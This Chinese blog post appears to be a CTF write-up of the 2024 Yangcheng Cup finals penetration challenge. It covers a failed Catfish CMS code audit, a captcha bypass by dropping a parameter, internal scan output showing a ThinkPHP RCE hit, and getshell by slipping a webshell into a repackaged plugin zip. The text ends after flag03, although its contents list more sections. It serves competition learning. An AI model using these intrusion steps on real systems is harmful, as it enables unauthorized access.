
<!DOCTYPE html>
<html lang="zh-CN">

<head>
  <meta charset="UTF-8" />
  <title>2024羊城杯决赛 | 雲流のLowest World</title>
  <meta name="author" content="C1oudfL0w0" />
  <meta name="description" content="" />
  <meta name="keywords" content="" />
  <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" />
  <link rel="icon" href="/blog/images/croppedImage_cropped.jpg" />
  <!-- cdn挂掉的时候要可以引用本地 -->
<!-- <script src="https://cdn.staticfile.org/vue/3.2.45/vue.global.prod.min.js"></script> -->
<script src="/blog/js/vue.global.prod.min.js"></script>


<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.2.1/css/all.min.css" />


<link rel="stylesheet" href="/blog/css/all.min.css" />
<link rel="stylesheet" href="/blog/css/fonts.min.css" />
<link rel="stylesheet" href="/blog/css/search.css" />
<script> const mixins = {}; </script>


<!--改成了prismjs高亮-->

<script src="/blog/js/lib/prism.js"></script>
<link rel="stylesheet" href="/blog/css/prism.css" rel="stylesheet" />



<script src="/blog/js/lib/preview.js"></script>










<script src="/blog/js/lib/home.js"></script>

<link rel="stylesheet" href="/blog/css/main.css" />
<!-- 引入不蒜子-->

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<script type="text/javascript" src="/blog/js/lib/codeBlock/codeBlockFuction.js"></script>
<!-- 代码语言 -->
<script type="text/javascript" src="/blog/js/lib/codeBlock/codeLang.js"></script>
<!-- 代码块复制 -->
<!-- 引入clipboard -->

<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.8/clipboard.min.js"></script>

<script type="text/javascript" src="/blog/js/lib/codeBlock/codeCopy.js"></script>
<!-- 代码块收缩 -->
<script type="text/javascript" src="/blog/js/lib/codeBlock/codeShrink.js"></script> 
<!-- 代码块折行 -->
<style type="text/css">code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }</style>
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/blog/atom.xml" title="雲流のLowest World" type="application/atom+xml">
</head>

<body>
  <!--flag{never_g0nna g1ve_you up}-->

  <!-- 页面点击特效 -->
  <script type="text/javascript" src="/blog/js/love-click.js"></script>

  <!-- 浏览器标题 -->
  <script async type="text/javascript" src="/blog/js/FunnyTitle.js"></script>

  <!-- 动态背景 -->
  

  <!--文章目录-->
  
    <div id="toc" class="toc-article">
    <h3><i class="fas fa-stream"></i>  目录</h3>
      <div class="toc-title"></div>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B8%97%E9%80%8F%E9%83%A8%E5%88%86"><span class="toc-number">2.</span> <span class="toc-text">渗透部分</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag02"><span class="toc-number">2.1.</span> <span class="toc-text">flag02</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Catfish-CMS%E5%AE%A1%E8%AE%A1%EF%BC%88Failed%EF%BC%89"><span class="toc-number">2.1.1.</span> <span class="toc-text">Catfish CMS审计（Failed）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag01"><span class="toc-number">2.2.</span> <span class="toc-text">flag01</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag03"><span class="toc-number">2.3.</span> <span class="toc-text">flag03</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag14"><span class="toc-number">2.4.</span> <span class="toc-text">flag14</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag04"><span class="toc-number">2.5.</span> <span class="toc-text">flag04</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94"><span class="toc-number">3.</span> <span class="toc-text">应急响应</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag02-1"><span class="toc-number">3.1.</span> <span class="toc-text">flag02</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag01-1"><span class="toc-number">3.2.</span> <span class="toc-text">flag01</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag03-1"><span class="toc-number">3.3.</span> <span class="toc-text">flag03</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%90%8E%E6%97%A5%E8%B0%88"><span class="toc-number">4.</span> <span class="toc-text">后日谈</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#docker%E5%86%85%E9%83%A8%E5%86%85%E7%BD%91ip%E7%9A%84%E8%8E%B7%E5%8F%96"><span class="toc-number">4.1.</span> <span class="toc-text">docker内部内网ip的获取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E5%90%91shell"><span class="toc-number">4.2.</span> <span class="toc-text">正向shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E5%90%91%E4%BB%A3%E7%90%86"><span class="toc-number">4.3.</span> <span class="toc-text">正向代理</span></a></li></ol></li></ol>
    </div>
    <script>
    (function () {
        function initTocHighlight() {
            var tocLinks = document.querySelectorAll('#toc .toc-link');
            if (!tocLinks.length) return;

            // 收集所有标题锚点对应的 DOM 元素
            var headings = [];
            tocLinks.forEach(function (link) {
                var href = link.getAttribute('href');
                if (!href) return;
                var id = decodeURIComponent(href.slice(1));
                var el = document.getElementById(id);
                if (el) headings.push({ el: el, link: link });
            });
            if (!headings.length) return;

            var activeLink = null;
            var offset = 80;

            function highlight() {
                var scrollTop = window.pageYOffset || document.documentElement.scrollTop;
                var current = null;

                for (var i = 0; i < headings.length; i++) {
                    if (headings[i].el.getBoundingClientRect().top <= offset + 10) {
                        current = headings[i];
                    }
                }

                // 仅在用户确实滚动过、且到达页面底部时，才强制高亮最后一个
                if (scrollTop > 100 && window.innerHeight + scrollTop >= document.documentElement.scrollHeight - 50) {
                    current = headings[headings.length - 1];
                }

                // 页面顶部且没有标题进入视口时，高亮第一个
                if (scrollTop == 0) {
                    current = headings[0];
                }

                if (current && current.link !== activeLink) {
                    // 清除所有高亮
                    tocLinks.forEach(function (link) {
                        link.classList.remove('toc-active');
                    });

                    // 高亮当前项
                    current.link.classList.add('toc-active');
                    activeLink = current.link;

                    // TOC 容器自动滚动，使当前项可见
                    var tocEl = document.getElementById('toc');
                    var linkRect = activeLink.getBoundingClientRect();
                    var tocRect = tocEl.getBoundingClientRect();
                    if (linkRect.top < tocRect.top || linkRect.bottom > tocRect.bottom) {
                        activeLink.scrollIntoView({ block: 'center', behavior: 'smooth' });
                    }
                } else if (!current && activeLink) {
                    tocLinks.forEach(function (link) {
                        link.classList.remove('toc-active');
                    });
                    activeLink = null;
                }
            }

            var ticking = false;
            window.addEventListener('scroll', function () {
                if (!ticking) {
                    requestAnimationFrame(function () {
                        highlight();
                        ticking = false;
                    });
                    ticking = true;
                }
            });

            // 初始高亮
            highlight();
        }

        // 等待页面完全加载后再初始化（确保文章标题 DOM 已渲染）
        if (document.readyState === 'complete') {
            initTocHighlight();
        } else {
            window.addEventListener('load', initTocHighlight);
        }
    })();
    </script>
  

  <!--返回顶部-->
  <div id="totop" style="position:fixed;bottom:50px;right:60px;font-size: 48px;cursor: pointer;z-index: 10;">
    <a title="返回顶部">↑</a>
  </div>
  <script src="/blog/js/totop.js"></script>

  <div id="layout">
    
    <div id="content-background" ref="contentBackground" data-images="https://pic.imgdb.cn/item/65d61d809f345e8d03b8bc7a.png"></div>
    
    <transition name="fade">
      <div id="loading" v-show="loading">
        <div id="loading-circle">
          <h2>LOADING</h2>
          <p>第一次加载文章图片可能会花费较长时间</p>
          <p>要不挂个梯子试试？（x</p>
          <p>加载过慢请开启缓存&ensp;浏览器默认开启</p>
          <img src="/blog/images/loading.gif" />
        </div>
      </div>
    </transition>
    <transition name="into">
      <div id="main" v-show="!loading">
        <nav id="menu" ref="menu">
    <div class="desktop-menu">
        <a class="title" href="/blog/">
            <span>雲流のLOWEST WORLD</span>
        </a>
        
        <a href="/blog/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/blog/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/blog/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/blog/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/blog/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
        <a href="/blog/links">
            <i class="fa-solid fa-link fa-fw"></i>
            <span>&ensp;Links</span>
        </a>
        
        <a href="/blog/search">
            <i class="fa-solid fa-search fa-fw"></i>
            <span>&ensp;Search</span>
        </a>
        
    </div>
    <div id="mobile-menu">
        <div class="curtain" v-show="showMenu" @click="showMenu = !showMenu"></div>
        <div class="title" @click="showMenu = !showMenu">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;雲流のLOWEST WORLD</span>
        </div>
        <transition name="slide">
        <div class="items" v-show="showMenu">
            
            <a href="/blog/">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-house fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                </div>
            </a>
            
            <a href="/blog/about">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-id-card fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                </div>
            </a>
            
            <a href="/blog/archives">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-box-archive fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                </div>
            </a>
            
            <a href="/blog/categories">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-bookmark fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                </div>
            </a>
            
            <a href="/blog/tags">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-tags fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                </div>
            </a>
            
            <a href="/blog/links">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-link fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Links</div>
                </div>
            </a>
            
            <a href="/blog/search">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-search fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Search</div>
                </div>
            </a>
            
        </div>
        </transition>
    </div>
</nav>

        <div class="article">
    <div>
        <h1>2024羊城杯决赛</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2024/9/11
        </span>
        
        <span class="category">
            <a href="/blog/categories/%E7%BA%BF%E4%B8%8B%E8%B5%9B/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                线下赛
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            <span class="tag">
                
                <a href="/blog/tags/CMS/" style="color: #ffa2c4">CMS</a>
            </span>
            
            <span class="tag">
                
                <a href="/blog/tags/Docker/" style="color: #00bcd4">Docker</a>
            </span>
            
        </span>
        
        <!--文章字数统计-->
        
            
<div style="margin-top:10px;">
    <span class="post-time">
      <span class="post-meta-item-icon">
        <i class="fa fa-keyboard-o"></i>
        <span class="post-meta-item-text">  字数统计: </span>
        <!-- 安装插件npm install hexo-wordcount --save -->
        <span class="post-count">2.1k字</span>
      </span>
    </span>

    <span class="post-time">
      &nbsp; | &nbsp;
      <span class="post-meta-item-icon">
        <i class="fa fa-hourglass-half"></i>
        <span class="post-meta-item-text">  阅读时长: </span>
        <span class="post-count">9分</span>
      </span>
    </span>
    
    <!--不蒜子统计访问数-->
    <span id="busuanzi_container_page_pv">
    &nbsp; | &nbsp;
    总文章阅读量：<span id="busuanzi_value_page_pv"></span>次
    </span>
</div>

          
    </div>
    
    <div class="content" v-pre>
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>首次遇上安恒渗透，docker环境命令限制，没发vps困难重重，拼尽全力也无法战胜</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911164742109.png" alt="image-20240911164742109"></p>
<span id="more"></span>

<hr>
<h1 id="渗透部分"><a href="#渗透部分" class="headerlink" title="渗透部分"></a>渗透部分</h1><h2 id="flag02"><a href="#flag02" class="headerlink" title="flag02"></a>flag02</h2><p>dirsearch扫目录，有robots.txt</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911102531988.png" alt="image-20240911102531988"></p>
<p>访问 &#x2F;flag2.txt 即可得到</p>
<p>还有archive.zip，是官网的源码，Catfish cms，tp5.0.0框架</p>
<h3 id="Catfish-CMS审计（Failed）"><a href="#Catfish-CMS审计（Failed）" class="headerlink" title="Catfish CMS审计（Failed）"></a>Catfish CMS审计（Failed）</h3><p>搜了下本地文库都是xss的洞，完全用不上</p>
<p>我们可以自行注册登录账号，在用户后台发现头像处存在文件上传，对应的代码：</p>
<p>application&#x2F;user&#x2F;controller&#x2F;Index.php</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">uploadhead</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token function">request</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">-></span><span class="token function">file</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'file'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$validate</span> <span class="token operator">=</span> <span class="token punctuation">[</span>
        <span class="token string single-quoted-string">'ext'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'jpg,png,gif,jpeg'</span>
    <span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token variable">$file</span><span class="token operator">-></span><span class="token function">validate</span><span class="token punctuation">(</span><span class="token variable">$validate</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$info</span> <span class="token operator">=</span> <span class="token variable">$file</span><span class="token operator">-></span><span class="token function">move</span><span class="token punctuation">(</span><span class="token constant">ROOT_PATH</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'data'</span> <span class="token operator">.</span> <span class="token constant">DS</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'uploads'</span><span class="token punctuation">,</span><span class="token constant boolean">true</span><span class="token punctuation">,</span><span class="token constant boolean">true</span><span class="token punctuation">,</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token function">picpre</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$info</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token variable">$image</span> <span class="token operator">=</span> <span class="token class-name class-name-fully-qualified static-context"><span class="token punctuation">\</span>think<span class="token punctuation">\</span>Image</span><span class="token operator">::</span><span class="token function">open</span><span class="token punctuation">(</span><span class="token constant">ROOT_PATH</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'data'</span> <span class="token operator">.</span> <span class="token constant">DS</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'uploads'</span> <span class="token operator">.</span> <span class="token constant">DS</span> <span class="token operator">.</span> <span class="token variable">$info</span><span class="token operator">-></span><span class="token function">getSaveName</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$width</span> <span class="token operator">=</span> <span class="token variable">$image</span><span class="token operator">-></span><span class="token function">width</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$height</span> <span class="token operator">=</span> <span class="token variable">$image</span><span class="token operator">-></span><span class="token function">height</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$width</span> <span class="token operator">></span> <span class="token number">300</span> <span class="token operator">||</span> <span class="token variable">$height</span> <span class="token operator">></span> <span class="token number">300</span><span class="token punctuation">)</span>
        <span class="token punctuation">&#123;</span>
            @<span class="token variable">$image</span><span class="token operator">-></span><span class="token function">thumb</span><span class="token punctuation">(</span><span class="token number">300</span><span class="token punctuation">,</span> <span class="token number">300</span><span class="token punctuation">,</span><span class="token class-name class-name-fully-qualified static-context"><span class="token punctuation">\</span>think<span class="token punctuation">\</span>Image</span><span class="token operator">::</span><span class="token constant">THUMB_CENTER</span><span class="token punctuation">)</span><span class="token operator">-></span><span class="token function">save</span><span class="token punctuation">(</span><span class="token constant">ROOT_PATH</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'data'</span> <span class="token operator">.</span> <span class="token constant">DS</span> <span class="token operator">.</span> <span class="token string single-quoted-string">'uploads'</span> <span class="token operator">.</span> <span class="token constant">DS</span> <span class="token operator">.</span> <span class="token variable">$info</span><span class="token operator">-></span><span class="token function">getSaveName</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
        <span class="token keyword">echo</span> <span class="token variable">$info</span><span class="token operator">-></span><span class="token function">getSaveName</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">else</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token string single-quoted-string">''</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token comment">// catfish/library/think/File.php</span>
<span class="token comment">/**
     * 设置上传文件的验证规则
     * @param  array   $rule    验证规则
     * @return $this
*/</span>
<span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">validate</span><span class="token punctuation">(</span><span class="token variable">$rule</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">validate</span> <span class="token operator">=</span> <span class="token variable">$rule</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token variable">$this</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以返回上传文件的路径，但是后缀限制是白名单没法利用</p>
<p>尝试找文件包含，但是只有模板渲染的代码</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240913235138153.png" alt="image-20240913235138153"></p>
<p>一路跟过去没找到可利用的地方</p>
<p>注意到登录接口调用了 tp 的 captcha，抓包发现删掉 captcha 参数就可以绕过验证码登录，尝试爆破admin的密码，失败</p>
<p>再看一下sql的部分，3306端口没开，不能直接连数据库，翻了半天也没找到能注入的点</p>
<p>&#x2F;public&#x2F;commom&#x2F;umeditor 有个编辑器，对应的代码在 public&#x2F;common&#x2F;umeditor&#x2F;php&#x2F; 下</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
    <span class="token function">header</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Content-Type:text/html;charset=utf-8"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">error_reporting</span><span class="token punctuation">(</span> <span class="token class-name">E_ERROR</span> <span class="token operator">|</span> <span class="token class-name">E_WARNING</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">date_default_timezone_set</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Asia/chongqing"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">include</span> <span class="token string double-quoted-string">"Uploader.class.php"</span><span class="token punctuation">;</span>
    <span class="token comment">//上传配置</span>
    <span class="token variable">$config</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span>
        <span class="token string double-quoted-string">"savePath"</span> <span class="token operator">=></span> <span class="token string double-quoted-string">"../../../../data/uploads/"</span> <span class="token punctuation">,</span>             <span class="token comment">//存储文件夹</span>
        <span class="token string double-quoted-string">"maxSize"</span> <span class="token operator">=></span> <span class="token number">5000</span> <span class="token punctuation">,</span>                   <span class="token comment">//允许的文件最大尺寸，单位KB</span>
        <span class="token string double-quoted-string">"allowFiles"</span> <span class="token operator">=></span> <span class="token keyword">array</span><span class="token punctuation">(</span> <span class="token string double-quoted-string">".gif"</span> <span class="token punctuation">,</span> <span class="token string double-quoted-string">".png"</span> <span class="token punctuation">,</span> <span class="token string double-quoted-string">".jpg"</span> <span class="token punctuation">,</span> <span class="token string double-quoted-string">".jpeg"</span> <span class="token punctuation">,</span> <span class="token string double-quoted-string">".bmp"</span> <span class="token punctuation">,</span> <span class="token string double-quoted-string">".webp"</span> <span class="token punctuation">)</span>  <span class="token comment">//允许的文件格式</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment">//上传文件目录</span>
    <span class="token variable">$Path</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"../../../../data/uploads/"</span><span class="token punctuation">;</span>

    <span class="token comment">//背景保存在临时目录中</span>
    <span class="token variable">$config</span><span class="token punctuation">[</span> <span class="token string double-quoted-string">"savePath"</span> <span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token variable">$Path</span><span class="token punctuation">;</span>
    <span class="token variable">$up</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Uploader</span><span class="token punctuation">(</span> <span class="token string double-quoted-string">"upfile"</span> <span class="token punctuation">,</span> <span class="token variable">$config</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$type</span> <span class="token operator">=</span> <span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'type'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token variable">$callback</span><span class="token operator">=</span><span class="token function">htmlspecialchars</span><span class="token punctuation">(</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'('</span><span class="token punctuation">,</span><span class="token string single-quoted-string">')'</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token string single-quoted-string">''</span><span class="token punctuation">,</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'callback'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token variable">$info</span> <span class="token operator">=</span> <span class="token variable">$up</span><span class="token operator">-></span><span class="token function">getFileInfo</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment">/**
     * 返回数据
     */</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$callback</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token string single-quoted-string">'&lt;script>'</span><span class="token operator">.</span><span class="token variable">$callback</span><span class="token operator">.</span><span class="token string single-quoted-string">'('</span><span class="token operator">.</span><span class="token function">json_encode</span><span class="token punctuation">(</span><span class="token variable">$info</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string single-quoted-string">')&lt;/script>'</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token function">json_encode</span><span class="token punctuation">(</span><span class="token variable">$info</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>也是白名单文件上传，同时会转义html，xss也没希望</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240914000011840.png" alt="image-20240914000011840"></p>
<p>找一下有没有反序列化入口，翻了一圈发现反序列化数据基本上都是从数据库或者缓存里面获取的</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240914000148128.png" alt="image-20240914000148128"></p>
<p>那怎么办，想到前面有 captcha 接口，找一下rce的链子</p>
<p>结果测试了半天发现captcha不能用post访问，一访问就重定向到404</p>
<p>调试了半天，发现不用post请求的话 filter 根本进不去<code>call_user_func</code></p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240914000911275.png" alt="image-20240914000911275"></p>
<p>一早上都在挖链子还没结果，真完蛋woc</p>
<hr>
<h2 id="flag01"><a href="#flag01" class="headerlink" title="flag01"></a>flag01</h2><p>吃完午饭剩两个小时左右，此时依旧是只交了一个flag，队友nmap扫高端口才发现35007上也开了个tp。。。nm</p>
<p>是个ai站，这个可以直接用工具一把梭</p>
<p>根目录下有flag01</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911140056571.png" alt="image-20240911140056571"></p>
<p>然后逆天的来了，docker起的渗透环境里面没有<code>ipconfig</code>等相关的命令</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240914001657513.png" alt="image-20240914001657513"></p>
<p>靠队友翻hosts才拿到内网ip</p>
<pre class="line-numbers language-txt" data-language="txt"><code class="language-txt">192.168.54.70:80 open
192.168.54.1:22 open
192.168.54.1:80 open
192.168.54.130:80 open
192.168.54.107:3306 open
[*] WebTitle http://192.168.54.130     code:200 len:46512  title:AI.Tech - YangCheng Artificial Intelligence
[*] WebTitle http://192.168.54.1       code:200 len:30753  title:羊城数智科技有限公司 | Yangcheng Technology
[*] WebTitle http://192.168.54.70      code:200 len:30762  title:羊城数智科技有限公司 | Yangcheng Technology
[+] PocScan http://192.168.54.130 poc-yaml-thinkphp5023-method-rce poc1
192.168.30.1:22 open
192.168.54.1:22 open
192.168.95.1:22 open
192.168.119.1:22 open
192.168.130.1:22 open

[*] WebTitle http://192.168.30.130     code:200 len:282    title:None
[*] WebTitle http://192.168.30.100:8848 code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle http://192.168.30.33:8080 code:404 len:713    title:HTTP Status 404 – Not Found
[*] WebTitle http://192.168.30.121     code:200 len:7080   title:系统发生错误
[*] WebTitle http://192.168.30.1       code:200 len:7080   title:系统发生错误
[+] PocScan http://192.168.30.100:8848 poc-yaml-alibaba-nacos<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>有个数据库，但是账密不是官网源码的那个，继续扫下面5个的c段发现对应的web服务</p>
<p>另一个问题是反弹shell，没发vps，然后测了下也不通我们主机的ip，也是靠队友搭正向shell代理出来</p>
<hr>
<h2 id="flag03"><a href="#flag03" class="headerlink" title="flag03"></a>flag03</h2><p>队友找到个 Confluence 服务，里面找到官网账密和OA系统的账密，OA貌似在二层内网</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911161246923.png" alt="image-20240911161246923"></p>
<p>那么就能进管理员后台了，然后不能点设置主题，不然会被重定向回登录页硬控几分钟。。。</p>
<p>注意到上传插件处可以传zip，但是zip里的内容得是规定格式才能显示在插件列表里边</p>
<p>直接关闭原先的 announcement 插件，然后打包源码里的 announcement 插件，插入webshell</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911161345491.png" alt="image-20240911161345491"></p>
<p>上传后再次启用</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911161312342.png" alt="image-20240911161312342"></p>
<p>此时访问主页就能getshell了</p>
<p><img src="/blog/2024/09/11/2024%E7%BE%8A%E5%9F%8E%E6%9D%AF%E5%86%B3%E8%B5%9B/image-20240911161430673.png" alt="image-20240911161430673"></p>
<hr>
